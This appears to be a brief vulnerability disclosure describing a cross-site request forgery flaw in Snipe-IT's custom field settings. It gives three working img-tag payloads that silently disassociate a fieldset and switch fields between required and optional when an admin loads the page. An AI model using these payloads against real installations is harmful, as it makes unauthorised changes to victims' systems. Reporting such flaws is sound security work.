CSRF in custom field settings
<img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
<img src="http://<SNIPE_IT_APP>/fields/required/3/3">
<img src="http://<SNIPE_IT_APP>/fields/optional/3/3">
This vulnerability is capable of trick admin user to modify custom forms